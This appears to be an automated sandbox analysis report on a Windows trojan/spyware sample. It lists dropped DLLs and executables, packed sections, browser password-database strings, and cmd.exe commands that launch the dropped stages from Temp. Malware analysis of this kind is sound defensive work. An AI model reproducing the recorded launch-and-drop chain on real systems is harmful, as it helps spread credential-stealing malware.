Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C436E63 0_2_6C436E63
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C415600 0_2_6C415600
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CC670 0_2_6C3CC670
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C407E10 0_2_6C407E10
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E9E50 0_2_6C3E9E50
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C429E30 0_2_6C429E30
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E4640 0_2_6C3E4640
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4376E3 0_2_6C4376E3
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E5E90 0_2_6C3E5E90
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42E680 0_2_6C42E680
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CBEF0 0_2_6C3CBEF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DFEF0 0_2_6C3DFEF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C424EA0 0_2_6C424EA0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D9F00 0_2_6C3D9F00
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C407710 0_2_6C407710
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F6FF0 0_2_6C3F6FF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CDFE0 0_2_6C3CDFE0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4177A0 0_2_6C4177A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3D7810 0_2_6C3D7810
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40F070 0_2_6C40F070
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40B820 0_2_6C40B820
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C414820 0_2_6C414820
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E8850 0_2_6C3E8850
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3ED850 0_2_6C3ED850
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4350C7 0_2_6C4350C7
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F60A0 0_2_6C3F60A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4058E0 0_2_6C4058E0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EC0E0 0_2_6C3EC0E0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C41B970 0_2_6C41B970
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43B170 0_2_6C43B170
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DD960 0_2_6C3DD960
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3EA940 0_2_6C3EA940
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FD9B0 0_2_6C3FD9B0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CC9A0 0_2_6C3CC9A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C405190 0_2_6C405190
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C422990 0_2_6C422990
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C409A60 0_2_6C409A60
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C408AC0 0_2_6C408AC0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DCAB0 0_2_6C3DCAB0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C22A0 0_2_6C3C22A0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3F4AA0 0_2_6C3F4AA0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40E2F0 0_2_6C40E2F0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3E1AF0 0_2_6C3E1AF0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C43BA90 0_2_6C43BA90
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C432AB0 0_2_6C432AB0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3DC370 0_2_6C3DC370
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C40D320 0_2_6C40D320
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C5340 0_2_6C3C5340
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4353C8 0_2_6C4353C8
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3CF380 0_2_6C3CF380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BA4CD0 10_2_00BA4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE3048 10_2_00BE3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BD7D63 10_2_00BD7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE6EE9 10_2_00BE6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BA4AD0 10_2_00BA4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE763B 10_2_00BE763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE2BB0 10_2_00BE2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE8700 10_2_00BE8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BE775B 10_2_00BE775B
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: String function: 6C4094D0 appears 90 times
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: String function: 6C3FCBE8 appears 134 times
Sample file is different than original file name gathered from version info
Source: 1jPL5zru3u.exe, 00000000.00000002.1889398481.000000006C452000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1jPL5zru3u.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001B5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCm1 vs 1jPL5zru3u.exe
Source: 1jPL5zru3u.exe, 00000000.00000002.1889717651.000000006C645000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1jPL5zru3u.exe
Uses 32bit PE files
Source: 1jPL5zru3u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1jPL5zru3u.exe Static PE information: Section: ZLIB complexity 0.9994759908536586
Source: 1jPL5zru3u.exe Static PE information: Section: ZLIB complexity 0.9935302734375
Source: 1jPL5zru3u.exe Static PE information: Section: ZLIB complexity 0.9891357421875
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9983723958333334
Source: amadka[1].exe.0.dr Static PE information: Section: ltpqnbtv ZLIB complexity 0.9945090835345608
Source: CAEHDBAAEC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983723958333334
Source: CAEHDBAAEC.exe.0.dr Static PE information: Section: ltpqnbtv ZLIB complexity 0.9945090835345608
Source: explorti.exe.6.dr Static PE information: Section: ZLIB complexity 0.9983723958333334
Source: explorti.exe.6.dr Static PE information: Section: ltpqnbtv ZLIB complexity 0.9945090835345608
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/27@0/3
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C427030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C427030
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 1jPL5zru3u.exe, 00000000.00000003.1726152515.00000000230B4000.00000004.00000020.00020000.00000000.sdmp, DGDBKFBAKFBFHIECFBFI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 1jPL5zru3u.exe, 00000000.00000002.1876202347.000000001D13D000.00000004.00000020.00020000.00000000.sdmp, 1jPL5zru3u.exe, 00000000.00000002.1889066952.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: CAEHDBAAEC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 1jPL5zru3u.exe String found in binary or memory: uy/AdD
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File read: C:\Users\user\Desktop\1jPL5zru3u.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1jPL5zru3u.exe "C:\Users\user\Desktop\1jPL5zru3u.exe"
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHJKKECFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe"
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe" Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHJKKECFIE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: coremessaging.dll Jump to behavior
